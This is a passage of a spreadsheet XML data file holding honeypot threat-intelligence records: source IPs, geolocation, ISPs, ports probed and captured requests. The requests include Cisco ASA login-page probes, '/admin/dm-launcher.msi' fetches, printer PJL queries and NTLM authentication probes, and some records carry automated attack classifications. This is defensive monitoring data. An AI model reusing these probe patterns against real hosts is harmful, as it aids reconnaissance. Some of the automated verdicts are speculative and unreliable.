'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '91.194.11.82', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.97.67', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '38.54.42.176:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '103.211.202.140:8443', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '103.113.68.70', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.8.69', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.8.69', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.8.69', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '156.244.8.69:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.79.122', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.79.122', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.79.122', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.115.66', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.115.66', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.115.66', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '91.194.11.82', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/dm-launcher.msi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'python-requests/2.32.3', 'method': 'GET', 'uri': '/admin/public/index.html'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:59f8:a2b5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze. &amp;&amp; No activity detected as TELNET service has never been active on this system. The lack of any recorded attempts to access the service suggests it may be inactive or not properly configured. No malicious activity was reported for this service. &amp;&amp; No log data provided, therefore no analysis can be conducted. &amp;&amp; There is no log data provided, so there's nothing to analyze or describe. &amp;&amp; No log data provided, therefore unable to analyze. &amp;&amp; An unknown host is making a GET request to a suspicious URL, likely attempting to access login credentials. The User-Agent suggests the request may be automated or malicious in nature. The Accept-Encoding header indicates potential compression or decompression capabilities. &amp;&amp; Possible malicious activity: Unauthorized access attempt to a web application, likely a brute-force login attack on a server at IP address 94.131.113.33, with the user agent identifying as python-requests/2.32.3. This is indicated by an unusual URI path '+CSCOE+/logon.html' and a 'method' of GET which could be probing for vulnerabilities. &amp;&amp; A user is accessing a sensitive administrative page on the target system, attempting to download a malicious executable likely for remote command execution or malware deployment. This activity suggests an attempted exploitation of vulnerabilities in the system's administration interface. The user agent indicates automated tools were used. &amp;&amp; A GET request to an administrator interface for a Windows installer file, suggesting an attempt to exploit or install malicious software remotely. The user agent is a legitimate Python library, indicating potential misuse of the library's functionality. This activity may be related to malware distribution or exploitation. &amp;&amp; This log indicates a GET request to an administrative page, potentially attempting unauthorized access or reconnaissance. The User-Agent suggests the activity is likely automated. The request targets an administrative path, which may be part of a larger malicious campaign. &amp;&amp; The user is trying to access the admin login page of a website, possibly for malicious purposes such as exploiting vulnerabilities or unauthorized access. The request is being made from an unknown IP address and using the Python Requests library, which may be used by attackers. This activity could indicate an attempt at unauthorized system access."/>
    <s v="Brute Force Attack &amp;&amp; Scanning Attempt &amp;&amp; Web Scanner &amp;&amp; SQLi Scan &amp;&amp; Malware Download &amp;&amp; Port Scanning_x000a_            &amp;&amp; Port Scan &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="395"/>
    <x v="395"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:12:08"/>
    <d v="2024-04-16T10:51:04"/>
    <d v="2025-04-29T18:12:08"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23&amp;&amp;43975&amp;&amp;44714&amp;&amp;39783&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="42"/>
    <s v="Gangwon-do"/>
    <s v="Wonju-si"/>
    <s v="Wŏnju (Myeongnyun-dong)"/>
    <s v="1833105"/>
    <s v="NA"/>
    <s v="37.335"/>
    <s v="127.944"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="myungryounONU"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd90:97cf"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="396"/>
    <x v="396"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:11:47"/>
    <d v="2024-07-18T14:05:04"/>
    <d v="2025-04-29T18:11:47"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Kutch"/>
    <s v="Bhuj (Madhapar)"/>
    <s v="1275812"/>
    <s v="370001"/>
    <s v="23.2411"/>
    <s v="69.6673"/>
    <s v="136654"/>
    <s v="Krishna Broadband"/>
    <s v="Krishna Broadband"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6760:dab"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="397"/>
    <x v="397"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:11:17"/>
    <d v="2024-04-02T10:58:00"/>
    <d v="2025-04-29T18:11:17"/>
    <n v="268"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SIP_H38&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_POP3_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;1433&amp;&amp;110&amp;&amp;23&amp;&amp;443&amp;&amp;21&amp;&amp;9100&amp;&amp;NA&amp;&amp;445&amp;&amp;5432&amp;&amp;3306&amp;&amp;25&amp;&amp;3389&amp;&amp;29042&amp;&amp;143"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;GET&amp;&amp;NA&amp;&amp;request&amp;&amp;command&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.181.21.224:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.188,32900)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '95.164.21.98:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.188;rport=5298'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.188;rport=2218'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.4.48.242:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 95.164.21.98:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '194.233.76.135:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.180.55.39:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.255.123.181:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '185.255.123.181:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '66.94.127.183:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.188;rport=13670'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.188,56164)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (kxYKiIpP,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8dbc"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="398"/>
    <x v="398"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:11:10"/>
    <d v="2023-12-03T18:11:00"/>
    <d v="2025-04-29T18:11:10"/>
    <n v="252"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;34096&amp;&amp;47348&amp;&amp;57488&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KH"/>
    <s v="Cambodia"/>
    <s v="12"/>
    <s v="Phnom Penh"/>
    <s v="NA"/>
    <s v="Phnom Penh"/>
    <s v="1821306"/>
    <s v="NA"/>
    <s v="11.5625"/>
    <s v="104.916"/>
    <s v="23673"/>
    <s v="COGETEL Co., Ltd"/>
    <s v="COGETEL Co"/>
    <s v="business"/>
    <s v="Cogetel Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cbbd:967d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This suggests an attempt to access Microsoft SQL Server, possibly via a brute force attack or exploitation of a vulnerability, without any specific success or failure indication. It may indicate probing for potential entry points or weaknesses. The lack of success might be due to various security measures in place."/>
    <m/>
  </r>
  <r>
    <x v="399"/>
    <x v="399"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:04:29"/>
    <d v="2025-04-29T18:04:29"/>
    <d v="2025-04-29T18:04:29"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:4cc7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="400"/>
    <x v="400"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T17:43:08"/>
    <d v="2025-04-29T17:43:08"/>
    <d v="2025-04-29T17:43:08"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d3:833d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="401"/>
    <x v="401"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T17:39:36"/>
    <d v="2025-04-29T17:39:36"/>
    <d v="2025-04-29T17:39:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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c:84e5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="402"/>
    <x v="402"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T17:13:50"/>
    <d v="2025-04-02T21:01:35"/>
    <d v="2025-04-29T17:13:50"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Đống Đa District"/>
    <s v="Đống Đa"/>
    <s v="8616121"/>
    <s v="NA"/>
    <s v="21.0201"/>
    <s v="105.831"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7646:74b2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity detected for TELNET service, as it is listed as Not Available (NA). This indicates no incoming connections or attempts to connect via TELNET were recorded during the monitoring period. It does not necessarily imply that the service was inactive or unavailable. &amp;&amp; No log data provided, unable to analyze."/>
    <s v="Scanning Attempt"/>
  </r>
  <r>
    <x v="403"/>
    <x v="403"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T17:11:37"/>
    <d v="2025-04-29T16:57:35"/>
    <d v="2025-04-29T17:11:37"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
